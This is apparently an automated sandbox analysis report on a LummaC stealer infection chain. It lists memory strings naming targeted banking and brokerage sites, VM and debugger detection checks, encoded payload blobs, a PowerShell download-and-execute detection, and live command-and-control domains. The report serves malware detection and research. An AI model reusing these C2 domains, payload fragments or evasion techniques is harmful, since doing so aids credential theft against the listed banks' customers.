Source: firefox.exe, 0000001C.00000002.2937358038.000001215761B000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW : 2 : 34 : 1 : 1 : 0x20026 : 0x8 : %SystemRoot%\system32\mswsock.dll : : 1234191b-4bf7-4ca7-86e0-dfd7c32b5445
Source: efe6fe4127.exe, 0000000C.00000003.2818371439.0000000006215000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: tasks.office.comVMware20,11696487552o
Source: efe6fe4127.exe, 0000000C.00000003.2818371439.0000000006215000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: global block list test formVMware20,11696487552
Source: efe6fe4127.exe, 0000000C.00000003.2818371439.0000000006215000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Interactive Brokers - COM.HKVMware20,11696487552
Source: efe6fe4127.exe, 0000000C.00000003.2818371439.0000000006215000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: AMC password management pageVMware20,11696487552
Source: efe6fe4127.exe, 0000000C.00000003.2818371439.0000000006215000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: interactivebrokers.comVMware20,11696487552
Source: efe6fe4127.exe, 0000000C.00000003.2818371439.0000000006215000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: dev.azure.comVMware20,11696487552j
Source: efe6fe4127.exe, 0000000C.00000003.2818371439.0000000006215000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: microsoft.visualstudio.comVMware20,11696487552x
Source: efe6fe4127.exe, 0000000C.00000003.2818371439.0000000006215000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: netportal.hdfcbank.comVMware20,11696487552
Source: efe6fe4127.exe, 0000000C.00000003.2818371439.0000000006215000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: trackpan.utiitsl.comVMware20,11696487552h
Source: firefox.exe, 0000001C.00000002.2931287187.00000121572AA000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAWYL
Source: efe6fe4127.exe, 0000000C.00000003.2818371439.0000000006215000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: outlook.office365.comVMware20,11696487552t
Source: num.exe, 00000030.00000002.3028252435.00000000014B8000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: VMwareVMware
Source: b76bb5cee7.exe, 0000000A.00000002.2767324044.00000000013A4000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAWPP=
Source: efe6fe4127.exe, 0000000C.00000003.2818371439.0000000006215000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Interactive Brokers - EU East & CentralVMware20,11696487552
Source: YQEN9A9QU4P1VROBPV5YS.exe, YQEN9A9QU4P1VROBPV5YS.exe, 00000003.00000002.2487281362.0000000000717000.00000040.00000001.01000000.00000006.sdmp, 99Q4Y3O9GBOXYTDVM9GPHI.exe, 99Q4Y3O9GBOXYTDVM9GPHI.exe, 00000004.00000002.2462253080.0000000000723000.00000040.00000001.01000000.00000009.sdmp, b76bb5cee7.exe, 0000000A.00000002.2766477851.0000000000F11000.00000040.00000001.01000000.0000000F.sdmp, skotes.exe, 0000000B.00000002.2785411253.0000000000E73000.00000040.00000001.01000000.0000000C.sdmp, b76bb5cee7.exe, 0000001D.00000002.2962842335.0000000000F11000.00000040.00000001.01000000.0000000F.sdmp, U2242U1STHGPPKHG.exe, 0000001E.00000002.3009618076.00000000007B7000.00000040.00000001.01000000.00000017.sdmp, KYFYC2TR3U1EFHESW60D8PFEZTPDJOT.exe, 00000020.00000002.2947907757.00000000006D3000.00000040.00000001.01000000.00000019.sdmp Binary or memory string: HARDWARE\ACPI\DSDT\VBOX__
Source: efe6fe4127.exe, 0000000C.00000003.2818371439.0000000006215000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: secure.bankofamerica.comVMware20,11696487552|UE
Source: efe6fe4127.exe, 0000000C.00000003.2818371439.0000000006215000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: account.microsoft.com/profileVMware20,11696487552u
Source: efe6fe4127.exe, 0000000C.00000003.2818371439.0000000006215000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: bankofamerica.comVMware20,11696487552x
Source: num.exe, 00000030.00000002.3028252435.00000000014B8000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW0
Source: num.exe, 0000001F.00000002.2877033985.000000000081E000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: VMwareVMware{
Source: efe6fe4127.exe, 0000000C.00000003.2818371439.0000000006215000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Canara Change Transaction PasswordVMware20,11696487552
Source: efe6fe4127.exe, 0000000C.00000003.2818371439.000000000621A000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: - GDCDYNVMware20,11696487552p
Source: efe6fe4127.exe, 0000000C.00000003.2822365561.00000000062E2000.00000004.00000800.00020000.00000000.sdmp, efe6fe4127.exe, 0000000C.00000003.2822017373.00000000062DB000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: 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
Source: firefox.exe, 0000001C.00000002.2937948375.0000012157700000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll_
Source: num.exe, 00000030.00000002.3028252435.00000000014B8000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: VMwareVMwareh
Source: efe6fe4127.exe, 0000000C.00000003.2818371439.0000000006215000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: interactivebrokers.co.inVMware20,11696487552d
Source: firefox.exe, 0000001C.00000002.2937948375.0000012157700000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 00000021.00000002.2937356698.0000029B42210000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: efe6fe4127.exe, 0000000C.00000003.2818371439.0000000006215000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Interactive Brokers - HKVMware20,11696487552]
Source: firefox.exe, 0000001C.00000002.2937948375.0000012157700000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllz
Source: firefox.exe, 00000021.00000002.2937356698.0000029B42210000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll{
Source: efe6fe4127.exe, 0000000C.00000003.2937020002.00000000062E0000.00000004.00000800.00020000.00000000.sdmp, efe6fe4127.exe, 0000000C.00000003.2935211964.00000000062E0000.00000004.00000800.00020000.00000000.sdmp, efe6fe4127.exe, 0000000C.00000003.2961367554.00000000062E0000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: wV7y48/ITdP4M/PSOAzJ/HkaLJcsjdjnhQbDyaoUAa+FMRwoWhJBvMnzeLkMaVCYG1NaWHN/aSrkxVjgiuRb9tsS8Q4WhQcbkim7iMoyOZgJl5OYrQOnOTSVgGNwOB/E3uIC6RH4THKNpfamWGBHPLBt6Lhm3xM34g7ygXlCorNUKYPh8ZZ5braau967FwbeO5o1pHIsdubrKoaNNYEeMvcDymdblm2CC0Q5VXMkOQgYohlMadka/PhNe/MD3YKpEXhNQ4LhdYiADEA6OJjsMUXFJKIDUh4dyJpiEbehY8xIhAvThNKKRcv0Q3mFBaMYnhF4fO1h6ZMFsw1XStckRVu+LYDkoBAWriOp3mrhmjo9a+gZHWRMVWxqhmGkwPDYyjKMCw0Og3WVeEka+xsvn29TtmTfWbTJ0IYJkyXVZTogEvk0Ug/cTvdVBjxCPm0bNBY/sA3VxFhkhdzQsFcLBz6uGXB1DV0nbobJw9jhNYa0gG/En+48ZFhmCFIXmuZoqiopbM5c3YRODtzXlizVX/mAitADqNeW5oaJtWpjpinGWLCK8urG3jKNN0mmupGvcU5HlXybvdFUXWgqEhdpkMfvjkkaEbCSfMYSxkL4HWyoXAB1G5hDlqeMuUnwoUAFmVChtHrzZUujZ1qMtmQuVsgyJgRjoLosLTOWYnCQQNUD+mHRChOMZhQemhTYAQZgYPXrgAlY7arGVNjsQrU1hANJXXgrvFAvKP9iwWKe4wjrnFHs+Z6nrkdzDfsQ7pfwBivJDdeBjyC8ZBrYMHeatMrX4SJ1l2vEDg/GZZwN3qvaQEOk1nsYI0nQhADMY/hZsIxYmq3ilFF3yHgGzY6tEzFmBea/UBzFhAmYb1oqHrA2HYnHoIDc0qDg5jN/iSm+UGwHYbQqqkRJVpdhCsWfEsDQs2YatlmgMvGsygRH9PIZM241n1Wg
Source: efe6fe4127.exe, 0000000C.00000003.2818371439.0000000006215000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Interactive Brokers - NDCDYNVMware20,11696487552z
Source: efe6fe4127.exe, 0000000C.00000003.2818371439.0000000006215000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: www.interactivebrokers.co.inVMware20,11696487552~
Source: efe6fe4127.exe, 0000000C.00000003.2818371439.0000000006215000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Canara Change Transaction PasswordVMware20,11696487552^
Source: efe6fe4127.exe, 0000000C.00000003.2818371439.0000000006215000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Interactive Brokers - GDCDYNVMware20,11696487552p
Source: efe6fe4127.exe, 0000000C.00000003.2818371439.0000000006215000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Interactive Brokers - EU WestVMware20,11696487552n
Source: efe6fe4127.exe, 0000000C.00000003.2874295059.00000000062E4000.00000004.00000800.00020000.00000000.sdmp, efe6fe4127.exe, 0000000C.00000003.2921130845.00000000062E0000.00000004.00000800.00020000.00000000.sdmp, efe6fe4127.exe, 0000000C.00000003.2869175030.00000000062E4000.00000004.00000800.00020000.00000000.sdmp, efe6fe4127.exe, 0000000C.00000003.2835595634.00000000062E4000.00000004.00000800.00020000.00000000.sdmp, efe6fe4127.exe, 0000000C.00000003.2837176664.00000000062E4000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: zYXmAOlYkuN5JpKphnYFwV7y48/ITdP4M/PSOAzJ/HkaLJcsjdjnhQbDyaoUAa+FMRwoWhJBvMnzeLkMaVCYG1NaWHN/aSrkxVjgiuRb9tsS8Q4WhQcbkim7iMoyOZgJl5OYrQOnOTSVgGNwOB/E3uIC6RH4THKNpfamWGBHPLBt6Lhm3xM34g7ygXlCorNUKYPh8ZZ5braau967FwbeO5o1pHIsdubrKoaNNYEeMvcDymdblm2CC0Q5VXMkOQgYohlMadka/PhNe/MD3YKpEXhNQ4LhdYiADEA6OJjsMUXFJKIDUh4dyJpiEbehY8xIhAvThNKKRcv0Q3mFBaMYnhF4fO1h6ZMFsw1XStckRVu+LYDkoBAWriOp3mrhmjo9a+gZHWRMVWxqhmGkwPDYyjKMCw0Og3WVeEka+xsvn29TtmTfWbTJ0IYJkyXVZTogEvk0Ug/cTvdVBjxCPm0bNBY/sA3VxFhkhdzQsFcLBz6uGXB1DV0nbobJw9jhNYa0gG/En+48ZFhmCFIXmuZoqiopbM5c3YRODtzXlizVX/mAitADqNeW5oaJtWpjpinGWLCK8urG3jKNN0mmupGvcU5HlXybvdFUXWgqEhdpkMfvjkkaEbCSfMYSxkL4HWyoXAB1G5hDlqeMuUnwoUAFmVChtHrzZUujZ1qMtmQuVsgyJgRjoLosLTOWYnCQQNUD+mHRChOMZhQemhTYAQZgYPXrgAlY7arGVNjsQrU1hANJXXgrvFAvKP9iwWKe4wjrnFHs+Z6nrkdzDfsQ7pfwBivJDdeBjyC8ZBrYMHeatMrX4SJ1l2vEDg/GZZwN3qvaQEOk1nsYI0nQhADMY/hZsIxYmq3ilFF3yHgGzY6tEzFmBea/UBzFhAmYb1oqHrA2HYnHoIDc0qDg5jN/iSm+UGwHYbQqqkRJVpdhCsWfEsDQs2YatlmgMvGsygRH9PIZM241n1Wg
Source: efe6fe4127.exe, 0000000C.00000003.2818371439.0000000006215000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: outlook.office.comVMware20,11696487552s
Source: efe6fe4127.exe, 0000000C.00000003.2818371439.0000000006215000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Test URL for global passwords blocklistVMware20,11696487552
Source: b76bb5cee7.exe, 0000000A.00000002.2767324044.00000000013CF000.00000004.00000020.00020000.00000000.sdmp, b76bb5cee7.exe, 0000001D.00000002.2967959553.0000000001578000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAWK
Source: efe6fe4127.exe, 0000000C.00000003.2818371439.0000000006215000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: turbotax.intuit.comVMware20,11696487552t
Source: efe6fe4127.exe, 0000000C.00000003.2818371439.0000000006215000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Canara Transaction PasswordVMware20,11696487552x
Source: YQEN9A9QU4P1VROBPV5YS.exe, 00000003.00000002.2487281362.0000000000717000.00000040.00000001.01000000.00000006.sdmp, 99Q4Y3O9GBOXYTDVM9GPHI.exe, 00000004.00000002.2462253080.0000000000723000.00000040.00000001.01000000.00000009.sdmp, b76bb5cee7.exe, 0000000A.00000002.2766477851.0000000000F11000.00000040.00000001.01000000.0000000F.sdmp, skotes.exe, 0000000B.00000002.2785411253.0000000000E73000.00000040.00000001.01000000.0000000C.sdmp, b76bb5cee7.exe, 0000001D.00000002.2962842335.0000000000F11000.00000040.00000001.01000000.0000000F.sdmp, U2242U1STHGPPKHG.exe, 0000001E.00000002.3009618076.00000000007B7000.00000040.00000001.01000000.00000017.sdmp, KYFYC2TR3U1EFHESW60D8PFEZTPDJOT.exe, 00000020.00000002.2947907757.00000000006D3000.00000040.00000001.01000000.00000019.sdmp Binary or memory string: Restart now?\\.\Oreans.vxd%s\Oreans.vxdXprotEventHARDWARE\ACPI\DSDT\VBOX__SeShutdownPrivilegeSoftware\WinLicenseCreateEvent API Error while extraction the driverGetEnvironmentVariable API Error while extraction the driverOpenSCManager API Error while extraction the driverCreateService API Error while extraction the driverCloseServiceHandle API Error while extraction the driverOpenService API Error while extraction the driverStartService API Error while extraction the driverAPIC error: Cannot find Processors Control Blocks. Please,
Source: efe6fe4127.exe, 0000000C.00000003.2818371439.0000000006215000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Canara Transaction PasswordVMware20,11696487552}
Source: efe6fe4127.exe, 0000000C.00000003.2818371439.0000000006215000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696487552
Source: C:\Users\user\Desktop\file.exe System information queried: ModuleInformation Jump to behavior
Source: C:\Users\user\Desktop\file.exe Process information queried: ProcessInformation Jump to behavior

Anti Debugging
barindex
Hides threads from debuggers
Source: C:\Users\user\Desktop\file.exe Thread information set: HideFromDebugger Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\YQEN9A9QU4P1VROBPV5YS.exe Thread information set: HideFromDebugger Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\99Q4Y3O9GBOXYTDVM9GPHI.exe Thread information set: HideFromDebugger Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Thread information set: HideFromDebugger Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1003036001\efe6fe4127.exe Thread information set: HideFromDebugger Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1003037001\b76bb5cee7.exe Thread information set: HideFromDebugger
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Thread information set: HideFromDebugger
Source: C:\Users\user\AppData\Local\Temp\1003036001\efe6fe4127.exe Thread information set: HideFromDebugger
Source: C:\Users\user\AppData\Local\Temp\1003037001\b76bb5cee7.exe Thread information set: HideFromDebugger
Source: C:\Users\user\AppData\Local\Temp\U2242U1STHGPPKHG.exe Thread information set: HideFromDebugger
Source: C:\Users\user\AppData\Local\Temp\KYFYC2TR3U1EFHESW60D8PFEZTPDJOT.exe Thread information set: HideFromDebugger
Tries to detect sandboxes and other dynamic analysis tools (window names)
Source: C:\Users\user\AppData\Local\Temp\KYFYC2TR3U1EFHESW60D8PFEZTPDJOT.exe Open window title or class name: regmonclass
Source: C:\Users\user\AppData\Local\Temp\KYFYC2TR3U1EFHESW60D8PFEZTPDJOT.exe Open window title or class name: gbdyllo
Source: C:\Users\user\AppData\Local\Temp\KYFYC2TR3U1EFHESW60D8PFEZTPDJOT.exe Open window title or class name: process monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\AppData\Local\Temp\KYFYC2TR3U1EFHESW60D8PFEZTPDJOT.exe Open window title or class name: procmon_window_class
Source: C:\Users\user\AppData\Local\Temp\KYFYC2TR3U1EFHESW60D8PFEZTPDJOT.exe Open window title or class name: registry monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\AppData\Local\Temp\KYFYC2TR3U1EFHESW60D8PFEZTPDJOT.exe Open window title or class name: ollydbg
Source: C:\Users\user\AppData\Local\Temp\KYFYC2TR3U1EFHESW60D8PFEZTPDJOT.exe Open window title or class name: filemonclass
Source: C:\Users\user\AppData\Local\Temp\KYFYC2TR3U1EFHESW60D8PFEZTPDJOT.exe Open window title or class name: file monitor - sysinternals: www.sysinternals.com
Checks for debuggers (devices)
Source: C:\Users\user\AppData\Local\Temp\KYFYC2TR3U1EFHESW60D8PFEZTPDJOT.exe File opened: NTICE
Source: C:\Users\user\AppData\Local\Temp\KYFYC2TR3U1EFHESW60D8PFEZTPDJOT.exe File opened: SICE
Source: C:\Users\user\AppData\Local\Temp\KYFYC2TR3U1EFHESW60D8PFEZTPDJOT.exe File opened: SIWVID
Checks if the current process is being debugged
Source: C:\Users\user\Desktop\file.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\Desktop\file.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\Desktop\file.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\YQEN9A9QU4P1VROBPV5YS.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\YQEN9A9QU4P1VROBPV5YS.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\YQEN9A9QU4P1VROBPV5YS.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\99Q4Y3O9GBOXYTDVM9GPHI.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\99Q4Y3O9GBOXYTDVM9GPHI.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\99Q4Y3O9GBOXYTDVM9GPHI.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1003036001\efe6fe4127.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1003036001\efe6fe4127.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1003036001\efe6fe4127.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1003037001\b76bb5cee7.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\1003037001\b76bb5cee7.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\1003037001\b76bb5cee7.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\1003036001\efe6fe4127.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\1003036001\efe6fe4127.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\1003036001\efe6fe4127.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\1003037001\b76bb5cee7.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\1003037001\b76bb5cee7.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\1003037001\b76bb5cee7.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\U2242U1STHGPPKHG.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\U2242U1STHGPPKHG.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\U2242U1STHGPPKHG.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\KYFYC2TR3U1EFHESW60D8PFEZTPDJOT.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\KYFYC2TR3U1EFHESW60D8PFEZTPDJOT.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\KYFYC2TR3U1EFHESW60D8PFEZTPDJOT.exe Process queried: DebugPort
Contains functionality for execution timing, often used to detect debuggers
Source: C:\Users\user\AppData\Local\Temp\YQEN9A9QU4P1VROBPV5YS.exe Code function: 3_2_0070F17E rdtsc 3_2_0070F17E
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Source: C:\Users\user\AppData\Local\Temp\YQEN9A9QU4P1VROBPV5YS.exe Code function: 3_2_0059B7BA LdrInitializeThunk, 3_2_0059B7BA
Enables debug privileges
Source: C:\Users\user\AppData\Local\Temp\YQEN9A9QU4P1VROBPV5YS.exe Process token adjusted: Debug Jump to behavior
Source: C:\Windows\SysWOW64\taskkill.exe Process token adjusted: Debug
Source: C:\Windows\SysWOW64\taskkill.exe Process token adjusted: Debug
Source: C:\Windows\SysWOW64\taskkill.exe Process token adjusted: Debug
Source: C:\Windows\SysWOW64\taskkill.exe Process token adjusted: Debug
Source: C:\Windows\SysWOW64\taskkill.exe Process token adjusted: Debug
Source: C:\Users\user\AppData\Local\Temp\U2242U1STHGPPKHG.exe Process token adjusted: Debug
Source: C:\Users\user\AppData\Local\Temp\YQEN9A9QU4P1VROBPV5YS.exe Memory allocated: page read and write | page guard Jump to behavior

HIPS / PFW / Operating System Protection Evasion
barindex
Yara detected Powershell download and execute
Source: Yara match File source: Process Memory Space: b76bb5cee7.exe PID: 5712, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: b76bb5cee7.exe PID: 6444, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: num.exe PID: 6044, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: num.exe PID: 6456, type: MEMORYSTR
LummaC encrypted strings found
Source: file.exe, 00000000.00000003.2128348066.0000000004800000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: scriptyprefej.store
Source: file.exe, 00000000.00000003.2128348066.0000000004800000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: navygenerayk.store
Source: file.exe, 00000000.00000003.2128348066.0000000004800000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: founpiuer.store
Source: file.exe, 00000000.00000003.2128348066.0000000004800000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: necklacedmny.store
Source: file.exe, 00000000.00000003.2128348066.0000000004800000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: thumbystriw.store
Source: file.exe, 00000000.00000003.2128348066.0000000004800000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: fadehairucw.store
Source: file.exe, 00000000.00000003.2128348066.0000000004800000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: crisiwarny.store
Source: file.exe, 00000000.00000003.2128348066.0000000004800000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: presticitpo.store
Creates a process in suspended mode (likely to inject code)
Source: C:\Users\user\AppData\Local\Temp\99Q4Y3O9GBOXYTDVM9GPHI.exe Process created: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe "C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe" Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process created: C:\Users\user\AppData\Local\Temp\1003036001\efe6fe4127.exe "C:\Users\user\AppData\Local\Temp\1003036001\efe6fe4127.exe" Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process created: C:\Users\user\AppData\Local\Temp\1003037001\b76bb5cee7.exe "C:\Users\user\AppData\Local\Temp\1003037001\b76bb5cee7.exe" Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process created: C:\Users\user\AppData\Local\Temp\1003038001\deecb7b612.exe "C:\Users\user\AppData\Local\Temp\1003038001\deecb7b612.exe" Jump to behavior
